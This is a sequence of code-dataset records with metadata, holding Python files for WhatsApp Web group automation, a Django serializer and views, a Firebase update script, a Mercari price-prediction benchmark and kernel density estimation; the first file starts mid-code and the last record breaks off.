browser.find_element_by_css_selector('[title=\"New group\"]').click()\n sleep(8)\n inputbox = browser.find_element(By.CLASS_NAME, \"_17ePo\")\n for name in contacts:\n inputbox.send_keys(name)\n sleep(5)\n inputbox.send_keys(Keys.TAB + Keys.ENTER)\n sleep(1)\n browser.find_element_by_css_selector('[data-testid=\"arrow-forward\"]').click()\n sleep(1)\n browser.find_element(By.CLASS_NAME, \"_3FRCZ\").send_keys(groupname)\n sleep(1)\n browser.find_element(By.CLASS_NAME, \"_3y5oW\").click()\n sleep(3)\n if shouldreturnbrowser:\n return browser\n\n\ndef scrape_members_from_group(groupname, browser=None):\n members = []\n browser = open_session()\n inputbox = browser.find_element(By.CLASS_NAME, \"_3FRCZ\")\n inputbox.send_keys(groupname)\n sleep(5)\n inputbox.send_keys(Keys.TAB)\n sleep(3)\n browser.find_element(By.CSS_SELECTOR, \".DP7CM\").click()\n sleep(2)\n browser.find_element(By.CSS_SELECTOR, \"._3lS1C\").click()\n sleep(2)\n browser.find_element(By.CSS_SELECTOR, \"._3FRCZ\").click()\n sleep(1)\n preactive = None\n curractive = browser.switch_to.active_element\n while True:\n curractive.send_keys(Keys.ARROW_DOWN)\n curractive = browser.switch_to.active_element\n if curractive == preactive:\n break\n members.append(curractive.find_element(By.CSS_SELECTOR, \"._3ko75\").get_attribute('innerText'))\n preactive = curractive\n\n return members\n\ndef make_group_admins(groupname, members, browser=None):\n browser = open_session()\n inputbox = browser.find_element(By.CLASS_NAME, \"_3FRCZ\")\n inputbox.send_keys(groupname)\n sleep(5)\n inputbox.send_keys(Keys.TAB)\n sleep(3)\n browser.find_element(By.CSS_SELECTOR, \".DP7CM\").click()\n sleep(2)\n browser.find_element(By.CSS_SELECTOR, \"._3lS1C\").click()\n sleep(2)\n browser.find_element(By.CSS_SELECTOR, \"._3FRCZ\").click()\n sleep(1)\n preactive = None\n curractive = browser.switch_to.active_element\n while True:\n curractive.send_keys(Keys.ARROW_DOWN)\n sleep(1)\n curractive = browser.switch_to.active_element\n if curractive == preactive:\n break\n name = curractive.find_element(By.CSS_SELECTOR, \"._3ko75\").get_attribute('innerText')\n if name in members:\n try:\n curractive.find_element(By.CSS_SELECTOR, \".LwCwJ\")\n except:\n curractive.click()\n sleep(1)\n browser.find_element(By.CSS_SELECTOR, \".Ut_N0\").click()\n sleep(1)\n preactive = curractive\n sleep(3)\n\n# make_group_admins(\"yess\", [\"Navpreet Devpuri\", \"TiDdi\"])", "sub_path": "tithiwa/groups.py", "file_name": "groups.py", "file_ext": "py", "file_size_in_byte": 3316, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "session.open_session", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.TAB", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 29, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "session.open_session", "line_number": 43, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.TAB", "line_number": 47, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 47, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 50, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 51, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 51, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 53, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 53, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.ARROW_DOWN", "line_number": 58, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 62, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 62, "usage_type": "name"}, {"api_name": "session.open_session", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 69, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 69, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.TAB", "line_number": 72, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 72, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 74, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 74, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 76, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 76, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 77, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 78, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.ARROW_DOWN", "line_number": 83, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 83, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 88, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 88, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 91, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 91, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 95, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 95, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "554784592", "text": "# memorandi.location.serializers\n# Serialize the default models of the Location app\n#\n# Author: Benjamin Bengfort \n# Created: Wed Feb 12 00:31:21 2014 -0500\n#\n# Copyright (C) 2014 Bengfort.com\n# For license information, see LICENSE.txt\n#\n# ID: serializers.py [] benjamin@bengfort.com $\n\n\"\"\"\nSerialize the default models of the Location app\n\"\"\"\n\n##########################################################################\n## Imports\n##########################################################################\n\nfrom .models import *\nfrom rest_framework import serializers\n\n##########################################################################\n## Serializers\n##########################################################################\n\nclass LocationSerializer(serializers.HyperlinkedModelSerializer):\n\n region = serializers.RelatedField(source=\"region\")\n country = serializers.RelatedField(source=\"country\")\n\n class Meta:\n model = Location\n fields = ('id', 'url', 'name', 'address', 'city', 'region',\n 'country', 'postal_code', 'latitude', 'longitude', 'ipaddr')\n", "sub_path": "memorandi/location/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1131, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 27, "usage_type": "name"}, {"api_name": "rest_framework.serializers.RelatedField", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.serializers.RelatedField", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "426483336", "text": "import firebase_admin\nimport csv\nfrom firebase_admin import credentials, firestore\n\n\nif __name__ == \"__main__\":\n name = \"main\"\n\n cred = credentials.Certificate(\"./service-account.json\")\n firebase_app = firebase_admin.initialize_app(cred)\n\n db = firestore.client()\n\n artists_db = db.collection(\"artists\").stream()\n\n artists_array = []\n\n for artist in artists_db:\n artist_dict = artist.to_dict()\n artist_dict[\"uid\"] = artist.id\n artists_array.append(artist_dict)\n\n operators_array = []\n\n operators_db = db.collection(\"operators\").stream()\n\n for operator in operators_db:\n operator_dict = operator.to_dict()\n operator_dict[\"uid\"] = operator.id\n operators_array.append(operator_dict)\n\n failed_to_update = []\n\n with open('operator-rarity.csv', 'r', newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n for line in csv_reader:\n op_name = line[1]\n rarity = int(line[0].replace(\"*\", \"\"))\n\n print(op_name, rarity)\n\n operator = list(\n filter(lambda op: op[\"name\"] == op_name, operators_array))\n\n print(operator)\n if(len(operator) != 1):\n failed_to_update.append(op_name)\n print(\"Failed to update, adding to logs\")\n else:\n target_operator = operator[0] # the operator we want to update\n\n operator_id = target_operator[\"uid\"]\n print(operator_id)\n\n operator_ref = db.collection(\"operators\").document(operator_id)\n operator_ref.update({u\"rarity\": rarity})\n print(f\"successfully updated ${op_name}\")\n\n print(\"Failed to update the following:\")\n print(failed_to_update)\n", "sub_path": "update-operator-rarity.py", "file_name": "update-operator-rarity.py", "file_ext": "py", "file_size_in_byte": 1859, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "firebase_admin.credentials.Certificate", "line_number": 9, "usage_type": "call"}, {"api_name": "firebase_admin.credentials", "line_number": 9, "usage_type": "name"}, {"api_name": "firebase_admin.initialize_app", "line_number": 10, "usage_type": "call"}, {"api_name": "firebase_admin.firestore.client", "line_number": 12, "usage_type": "call"}, {"api_name": "firebase_admin.firestore", "line_number": 12, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 35, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 36, "usage_type": "attribute"}]} +{"seq_id": "207809426", "text": "# Original source: https://www.kaggle.com/lopuhin/mercari-golf-0-3875-cv-in-75-loc-1900-s\n# Data files can be found on Kaggle: https://www.kaggle.com/c/mercari-price-suggestion-challenge\n# They must be stripped of non-ascii characters as Willump does not yet support arbitrary Unicode.\n\n\nimport argparse\nimport pickle\nimport time\nfrom contextlib import contextmanager\nfrom operator import itemgetter\nfrom typing import List, Dict, Union\n\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse\nfrom keras.models import load_model\nfrom sklearn.model_selection import KFold\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import FunctionTransformer, StandardScaler\n\nimport price_utils\nfrom price_utils import *\nfrom willump.evaluation.willump_executor import willump_execute\n\nbase_folder = \"tests/test_resources/mercari_price_suggestion/\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-d\", \"--disable\", help=\"Disable Willump\", action=\"store_true\")\nargs = parser.parse_args()\n\n\n@contextmanager\ndef timer(name):\n t0 = time.time()\n yield\n print(f'[{name}] done in {time.time() - t0:.3f} s')\n\n\ndef preprocess(df: pd.DataFrame) -> pd.DataFrame:\n df['name'] = df['name'].fillna('') + ' ' + df['brand_name'].fillna('')\n df['text'] = (df['item_description'].fillna('') + ' ' + df['name'] + ' ' + df['category_name'].fillna(''))\n return df[['name', 'text', 'shipping', 'item_condition_id']]\n\n\ndef on_field(f: Union[str, List[str]], *vec) -> Pipeline:\n return make_pipeline(FunctionTransformer(itemgetter(f), validate=False), *vec)\n\n\ndef to_records(df: pd.DataFrame) -> List[Dict]:\n return df.to_dict(orient='records')\n\n\nmodel = load_model(base_folder + \"mercari_model.h5\")\n\n\n@willump_execute(disable=args.disable)\ndef predict_from_input(model_input, name_vectorizer, text_vectorizer, dict_vectorizer):\n model_input = preprocess(model_input)\n name_input = model_input[\"name\"].values\n name_vec = name_vectorizer.transform(name_input)\n text_input = model_input[\"text\"].values\n text_vec = text_vectorizer.transform(text_input)\n valid_records = to_records(model_input[[\"shipping\", \"item_condition_id\"]])\n dict_vec = dict_vectorizer.transform(valid_records)\n combined_vec = scipy.sparse.hstack([name_vec, dict_vec, text_vec], format=\"csr\")\n preds = willump_predict_function(model, combined_vec)\n return preds\n\n\ndef main():\n y_scaler = StandardScaler()\n train = pd.read_table(base_folder + 'train.tsv')\n train = train[train['price'] > 0].reset_index(drop=True)\n cv = KFold(n_splits=5, shuffle=True, random_state=42)\n train_ids, valid_ids = next(cv.split(train))\n train, valid = train.iloc[train_ids], train.iloc[valid_ids]\n y_scaler.fit_transform(np.log1p(train['price'].values.reshape(-1, 1)))\n price_utils.y_scaler = y_scaler\n y_true = valid['price'].values\n y_true = y_scaler.transform(np.log1p(y_true.reshape(-1, 1)))\n vectorizers = pickle.load(open(base_folder + \"mercari_vect_lr.pk\", \"rb\"))\n mini_valid = valid.iloc[0:3].copy()\n predict_from_input(mini_valid, *vectorizers).astype(np.float32)\n predict_from_input(mini_valid, *vectorizers).astype(np.float32)\n t0 = time.time()\n y_pred = predict_from_input(valid, *vectorizers).astype(np.float32)\n time_elapsed = time.time() - t0\n print(\"Time: %f Length: %d Throughput: %f\" % (time_elapsed, len(valid), len(valid) / time_elapsed))\n print('Valid 1 - RMSLE: {:.7f}'.format(willump_score_function(y_true, y_pred)))\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tests/benchmark_scripts/price_batch.py", "file_name": "price_batch.py", "file_ext": "py", "file_size_in_byte": 3546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}, {"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 32, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.FunctionTransformer", "line_number": 46, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 45, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 49, "usage_type": "name"}, {"api_name": "keras.models.load_model", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse.hstack", "line_number": 65, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 65, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 65, "usage_type": "name"}, {"api_name": "willump.evaluation.willump_executor.willump_execute", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.log1p", "line_number": 77, "usage_type": "call"}, {"api_name": "price_utils.y_scaler", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.log1p", "line_number": 80, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 84, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 86, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "589838930", "text": "from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.views import View\n\nfrom .forms import StudentForm\nfrom .models import Student\n\n#分离get,post的处理逻辑\n\nclass IndexView(View):\n template_name = 'index.html'\n\n def get_context(self):\n students =Student.get_all()\n context = {\n 'students':students,\n }\n return context\n\n def get(self,request):\n context = self.get_context()\n form =StudentForm()\n context.update({\n 'form':form\n })\n return render(request,self.template_name,context=context)\n\n def post(self,request):\n form = StudentForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('index'))\n context = self.get_context()\n context.update({\n 'form':form\n })\n return render(request,self.template_name,context=context)\n\n def test_get_index(self):\n #测试首页的可用性\n client = Client()\n response = client.get('/')\n self.assertEqual(response.status_code,200,'status code must be 200!')\n def test_post_student(self):\n client = Client()\n data = dict(\n name='test_post',\n sex=1,\n email='333@dd.com',\n profession=\"程序员\",\n qq='3333',\n phone = '3222',\n )\n response = client.post('/',data)\n self.assertEqual(response.status_code,302,'status code must be 302!')\n\n response = client.get('/')\n self.assertTure(b'test_for_post' in response.content,\n 'response content must contain \"test_for_post\"')\n# def index(request):\n# # words = 'World!'\n# #return render(request, 'index.html', context={\"words\":words})\n# students = Student.get_all()\n# #students = Student.objects_all()\n# if request.method == 'POST':\n# form = StudentForm(request.POST)\n# if form.is_valid():\n# # cleaned_data = form.cleaned_data\n# # student = Student()\n# # student.name = cleaned_data['name']\n# # student.sex = cleaned_data['sex']\n# # student.email = cleaned_data['profession']\n# # student.qq = cleaned_data['qq']\n# # student.phone = cleaned_data['phone']\n# form.save()\n# return HttpResponseRedirect(reverse('index'))\n# else:\n# form = StudentForm()\n#\n# context = {\n# 'students': students,\n# 'form': form,\n# }\n# return render(request, \"index.html\", context=context)", "sub_path": "student/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.views.View", "line_number": 11, "usage_type": "name"}, {"api_name": "models.Student.get_all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Student", "line_number": 15, "usage_type": "name"}, {"api_name": "forms.StudentForm", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "forms.StudentForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "401434924", "text": "from django.contrib import admin\n\nfrom blogging.models import Post, Category\n\n# Register your models here.\n\nclass CategoryInlineAdmin(admin.TabularInline):\n\n model = Category.posts.through\n extra = 1\n\nclass PostAdmin(admin.ModelAdmin):\n\n inlines = [CategoryInlineAdmin, ]\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n\n exclude = ('posts', )\n\n\nadmin.site.register(Post, PostAdmin)\nadmin.site.register(Category, CategoryAdmin)\n\n# Note: I found the similar example on this website: https://cewing.github.io/training.codefellows/lectures/day27/django_admin.html\n", "sub_path": "mysite/blogging/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.contrib.admin.TabularInline", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "blogging.models.Category.posts", "line_number": 9, "usage_type": "attribute"}, {"api_name": "blogging.models.Category", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 17, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 22, "usage_type": "call"}, {"api_name": "blogging.models.Post", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 23, "usage_type": "call"}, {"api_name": "blogging.models.Category", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "490226107", "text": "# y, t, optw, W, C, y95b, y95u, yb = KDERB(spike_times)\n\n# Function KDERB returns an optimized kernel density estimate using a Gauss kernel function.\n\n# Input arguments:\n# spike_times: sample data list or array.\n# Output arguments:\n# y: Estimated density\n# t: Points at which estimation was computed.\n# The same as tin if tin is provided.\n# (If the sampling resolution of tin is smaller than the sampling\n# resolution of the data, spike_times, the estimation was done at\n# smaller number of points than t. The results, t and y, are obtained\n# by interpolating the low resolution sampling points.)\n# optw:\n# Optimal kernel bandwidth.\n\n# Optimization principle:\n# The optimal bandwidth is obtained as a minimizer of the formula,\n# sum_{i, j} \\int k(x - x_i) k(x - x_j) dx - 2 sum_{i~=j} k(x_i - x_j),\n# where k(x) is the kernel function, according to\n\n# Hideaki Shimazaki and Shigeru Shinomoto\n# Kernel Bandwidth Optimization in Spike Rate Estimation\n# Journal of Computational Neuroscience 2010\n# http://dx.doi.org/10.1007/s10827-009-0180-4\n\n# The above optimization is based on a principle of minimizing\n# expected L2 loss function between the kernel estimate and an\n# unknown underlying density function. An assumption is merely\n# that samples are drawn from the density independently each other.\n\n# For more information, please visit\n# http://2000.jukuin.keio.ac.jp/shimazaki/res/kernel.html\n\n# See also SSVKERNEL, SSHIST, sskernel\n\n# Hideaki Shimazaki\n# http://2000.jukuin.keio.ac.jp/Shimazaki\n\n# (New correction in version 1)\n# y-axis was multiplied by the number of data, so that\n# y is a time hisogram representing the density of spikes.\n\n#\n# KDERB_rate_v2.py and KDERB_rate_v3.py\n# Junpei Naito 2017/11/14\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport numpy.fft as fft\nimport math\nimport time\n\n\ndef KDERB(spike_times) :\n start = time.time()\n spike_times = np.array(sorted(spike_times))\n max_value = max(spike_times)\n min_value = min(spike_times)\n T = max_value - min_value\n\n diff_spike = np.array(sorted(np.diff(spike_times)))\n dt_samp = diff_spike[np.nonzero(diff_spike)][0]\n \n tin = np.linspace(min_value, max_value, min(math.ceil(T / dt_samp), 1e3))\n spike_ab = spike_times[np.nonzero((spike_times >= min(tin)) * (spike_times <= max(tin)))]\n\n dt = min(np.diff(tin))\n\n y_hist = np.histogram(spike_ab, np.append(tin, max_value) - dt / 2)[0]\n L = len(y_hist)\n N = sum(y_hist)\n y_hist = y_hist / (N * dt)\n\n Wmin = 2 * dt\n Wmax = 1 * (max_value - min_value)\n\n tol = 1e-5\n phi = (math.sqrt(5) + 1) / 2\n\n a = ilogexp(Wmin)\n b = ilogexp(Wmax)\n\n c1 = (phi - 1) * a + (2 - phi) * b\n c2 = (2 - phi) * a + (phi - 1) * b\n\n f1 = CostFunction(y_hist, N, logexp(c1), dt)[0]\n f2 = CostFunction(y_hist, N, logexp(c2), dt)[0]\n\n k = 0\n W = [0] * 20\n C = [0] * 20\n\n #------------- revision in version 2 (2017/11/24) \n # repeat 20 times if c1+c2 < (difference between a and b)\n #------------- \n\n while(abs(b - a) > tol * (abs(c1) + abs(c2)) and k < 20) :\n if(f1 < f2) :\n b = c2\n c2 = c1\n\n c1 = (phi - 1) * a + (2 - phi) * b\n\n f2 = f1\n f1, yh1 = CostFunction(y_hist, N, logexp(c1), dt)\n\n W[k] = logexp(c1)\n C[k] = f1\n optw = logexp(c1)\n y = yh1 / sum(yh1 * dt)\n else :\n a = c1\n c1 = c2\n\n c2 = (2 - phi) * a + (phi - 1) * b\n\n f1 = f2\n f2, yh2 = CostFunction(y_hist, N, logexp(c2), dt)\n\n W[k] = logexp(c2)\n C[k] = f2\n optw = logexp(c2)\n y = yh2 / sum(yh2 * dt)\n\n k += 1\n\n y = y * len(spike_times)\n\n end = time.time()\n print(end - start)\n\n drawKDERB(y, tin)\n return y, tin, optw\n \ndef sort(mat) :\n N = len(mat[0])\n for i in range(0, N) :\n mat[:, i] = sorted(mat[:, i])\n\n return mat\n\ndef logexp(x) :\n if x < 1e2 :\n return math.log(1 + math.exp(x))\n if x >= 1e2 :\n return x\n\ndef ilogexp(x) :\n if x < 1e2 :\n return math.log(math.exp(x) - 1)\n if x >= 1e2 :\n return x\n\n \n\ndef CostFunction(y_hist, N, w, dt) :\n yh = fftkernel(list(y_hist), w / dt) # density\n halflen = math.ceil(len(y_hist) / 2)\n remlen = len(y_hist) - halflen\n addleft = fftkernel(list(np.r_[np.zeros(remlen), y_hist[0:halflen]]), w / dt)\n addright = fftkernel(list(np.r_[y_hist[halflen : len(y_hist)], np.zeros(remlen)]), w / dt)\n\n # formula for density\n C = sum(yh * yh) * dt - 2 * sum(yh * y_hist) * dt + 2 * 1 / (math.sqrt(2 * math.pi) * w * N)\n C *= N * N\n\n yh = yh + np.r_[np.fliplr([addleft[0:halflen]])[0], np.zeros(remlen)] + np.r_[np.zeros(remlen), np.fliplr([addright[halflen:len(addright)]])[0]]\n \n return C, yh\n\ndef fftkernel(x, w) :\n # y = fftkernel(x, w)\n # \n # Function `fftkernel' applies the Gauss kernel smoother to an input signal using FFT algorithm.\n #\n # Input argument\n # x : Sample signal vector\n # w : Kernel bandwidth (the standard deviation) in unit of the sampling resolution of x.\n # Output argument\n # y : Smoothed signal.\n #\n # MAY 5 / 23, 2012 Author Hideaki Shimazaki\n # RIKEN Brain Science Institute\n # http://2000.jukuin.keio.ac.jp/shimazaki\n # \n # (New correction in version 1)\n # y-axis was multiplied by the number of data, so that\n # y is a time histogram representing the density of spikes.\n\n L = len(x)\n Lmax = max(1.0, math.floor(L + 3.0 * w))\n n = int(2 ** (nextpow2(Lmax)))\n\n X = fft.fft(x, n)\n\n f = (np.array(range(0, n)) + 0.0) / n\n f = np.r_[-f[range(0, int(n / 2) + 1)], f[range(int(n / 2) - 1, 0, -1)]]\n\n K = np.exp(-0.5 * ((w * 2 * math.pi * f) ** 2))\n\n y = fft.ifft(X * K, n)\n\n y = y[0:L]\n\n return y\n\ndef nextpow2(n) :\n if (n < 0) :\n return 0\n else :\n m = int(math.ceil(math.log2(n)))\n\n return m\n \ndef drawKDERB(y, t) :\n plt.stackplot(t, y)\n plt.ylim(ymin = 0)\n plt.show()\n", "sub_path": "old_files/KDERB_rate_v3.py", "file_name": "KDERB_rate_v3.py", "file_ext": "py", "file_size_in_byte": 6060, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 66, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 71, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 131, "usage_type": "call"}, {"api_name": "math.log", "line_number": 146, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 146, "usage_type": "call"}, {"api_name": "math.log", "line_number": 152, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 152, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 160, "usage_type": 